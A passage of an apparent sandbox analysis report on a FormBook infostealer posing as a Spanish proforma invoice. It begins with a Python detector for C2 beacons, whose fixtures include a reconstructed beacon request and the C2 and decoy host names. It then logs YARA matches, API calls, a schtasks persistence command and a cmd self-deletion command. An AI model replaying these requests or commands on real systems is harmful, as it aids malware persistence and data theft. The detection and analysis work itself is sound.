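        headers[key.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "path": url.path, "query": parse_qs(url.query),
            "headers": headers, "body": body}

def classify(profile: dict, req: dict):
    """Score a parsed request; the weights and thresholds are this example's choice."""
    host = _bare(req["headers"].get("host", ""))
    score, reasons = 0, []
    if any(req["path"] == path for _, path in profile["c2"]):
        score += 3; reasons.append("URI path equals the configured C2 path")
    if any(host == h for h, _ in profile["c2"]):
        score += 3; reasons.append("Host is the configured C2")
    elif host in profile["decoys"]:
        score += 1; reasons.append("Host is one of the configured decoy domains")
    if "user-agent" not in req["headers"]:
        score += 1; reasons.append("no User-Agent header")
    if len(req["query"]) == 2:
        lens = sorted(len(v[0]) for v in req["query"].values())
        if lens[0] <= 16 and lens[1] >= 32:
            score += 1; reasons.append("two-parameter query: one short, one long opaque value")
    if req["method"] == "GET" and req["body"] and not req["body"].strip(b"\x00"):
        score += 1; reasons.append("GET carries a body of NUL bytes")
    verdict = "beacon" if score >= 5 else "suspicious" if score >= 3 else "benign"
    return verdict, score, reasons

PROFILE = load_config(CONFIG)

def classify_raw(raw: bytes):
    return classify(PROFILE, parse_request(raw))

# Reconstructed from the summarised capture in this report (decoy host, C2 path, 7 NUL bytes).
CAPTURED = (b"GET /cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD"
            b"&A0DXb=eZk4rh9h HTTP/1.1\r\nHost: www.aminobalm.com\r\nConnection: close\r\n\r\n"
            + b"\x00" * 7)
# Constructed controls, not from the report.
BROWSING_DECOY = b"GET / HTTP/1.1\r\nHost: www.aminobalm.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
C2_OTHER_PATH = b"GET /index.html HTTP/1.1\r\nHost: www.thefanlounge.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
UNRELATED = b"GET /status HTTP/1.1\r\nHost: example.com\r\nUser-Agent: curl/8.0\r\n\r\n"

if __name__ == "__main__":
    for label, raw in [("captured", CAPTURED), ("browsing decoy", BROWSING_DECOY),
                       ("c2 host, other path", C2_OTHER_PATH), ("unrelated", UNRELATED)]:
        verdict, score, reasons = classify_raw(raw)
        print(f"{label:20s} {verdict:10s} score={score} {reasons}")
```

Ordinary browsing to a decoy domain stays benign: the decoys are real third-party sites, so the host alone is weak evidence, and it is the combination with the configured path and the bare, User-Agent-less request that identifies the beacon. A request to the real C2 host on any other path is left at "suspicious" for an analyst to look at.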

            E-Banking Fraud:

Yara detected FormBook
Source: Yara match on the same twelve unpacked-PE and memory sources listed under AV Detection above.

            System Summary:

Malicious sample detected (through community Yara rule)
Matched rules: "autogenerated rule brought to you by yara-signator" (author: Felix Bilstein - yara-signator at cocacoding dot com) and "detect Formbook in memory" (author: JPCERT/CC Incident Response Group), both on each of the following sources:
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY
Source: Factura de proforma.exe, static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Rule metadata for the matches above:
Rule Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Rule Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Both rules matched on:
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\Factura de proforma.exe | Code function: 0_2_0296F298
            Source: C:\Users\user\Desktop\Factura de proforma.exe | Code function: 0_2_0296F288
            Source: C:\Users\user\Desktop\Factura de proforma.exe | Code function: 0_2_0296D064
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041F04E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041E872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00401030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041D97A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041EBDA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041E3A3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041E437
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00402D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00409E60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00409E1A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041D72A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041EF37
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00402FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01604120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015EF900
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016A1002
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016120A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016B20A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015FB090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016B2B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0161EBB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016B22AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016B1D55
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016B2D07
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015E0D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015FD5E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01612581
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015F841F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016B1FF1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01606E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016B2EF7
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047F841F
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048A1002
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047FB090
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047E0D20
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047EF900
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_047FD5E0
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04804120
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048B1D55
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04806E30
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0481EBB0
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_029AE872
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_02999E1A
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_02999E60
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_02992FB0
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_029AD72A
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_02992D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 015EB150 appears 35 times
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: String function: 047EB150 appears 32 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041A360 NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041A410 NtReadFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041A490 NtClose,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041A540 NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041A35A NtCreateFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041A53A NtAllocateVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016299A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016298F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016295D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016297A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016296E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629950 NtQueueApcThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016299D0 NtCreateProcessEx,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0162B040 NtSuspendThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629820 NtEnumerateKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016298A0 NtWriteVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629B00 NtSetValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0162A3B0 NtGetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629A10 NtQuerySection,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629A80 NtOpenDirectoryObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629560 NtWriteFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629520 NtWaitForSingleObject,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0162AD30 NtSetContextThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016295F0 NtQueryInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629760 NtOpenProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629770 NtSetInformationFile,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0162A770 NtOpenThread,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629730 NtQueryVirtualMemory,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0162A710 NtOpenProcessToken,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629FE0 NtCreateMutant,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629670 NtQueryInformationProcess,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629650 NtQueryValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01629610 NtEnumerateValueKey,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_016296D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048299A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048295D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048296D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048296E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048298A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048298F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0482B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048299D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048295F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0482AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_048297A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0482A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0482A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04829770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0482A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_029AA360 NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_029AA490 NtClose,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_029AA410 NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_029AA540 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_029AA35A NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_029AA53A NtAllocateVirtualMemory,
            Source: Factura de proforma.exe | Binary or memory string: OriginalFilename vs Factura de proforma.exe
            Source: Factura de proforma.exe, 00000000.00000002.327421631.0000000007900000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dll< vs Factura de proforma.exe
            Source: Factura de proforma.exe, 00000000.00000000.296727350.00000000007A2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameCachedDa.exe6 vs Factura de proforma.exe
            Source: Factura de proforma.exe, 00000000.00000002.322371267.0000000002B81000.00000004.00000001.sdmp | Binary or memory string: i,\\StringFileInfo\\000004B0\\OriginalFilename vs Factura de proforma.exe
            Source: Factura de proforma.exe | Binary or memory string: OriginalFilenameCachedDa.exe6 vs Factura de proforma.exe
            Source: Factura de proforma.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: tskpCbAwtxoaw.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: Factura de proforma.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: tskpCbAwtxoaw.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Factura de proforma.exe | File read: C:\Users\user\Desktop\Factura de proforma.exe
            Source: Factura de proforma.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Factura de proforma.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown | Process created: C:\Users\user\Desktop\Factura de proforma.exe 'C:\Users\user\Desktop\Factura de proforma.exe'
            Source: C:\Users\user\Desktop\Factura de proforma.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tskpCbAwtxoaw' /XML 'C:\Users\user\AppData\Local\Temp\tmpD689.tmp'
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Factura de proforma.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Factura de proforma.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\Factura de proforma.exe | File created: C:\Users\user\AppData\Local\Gottschalks
            Source: C:\Users\user\Desktop\Factura de proforma.exe | File created: C:\Users\user\AppData\Local\Temp\tmpD689.tmp
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/4@4/1
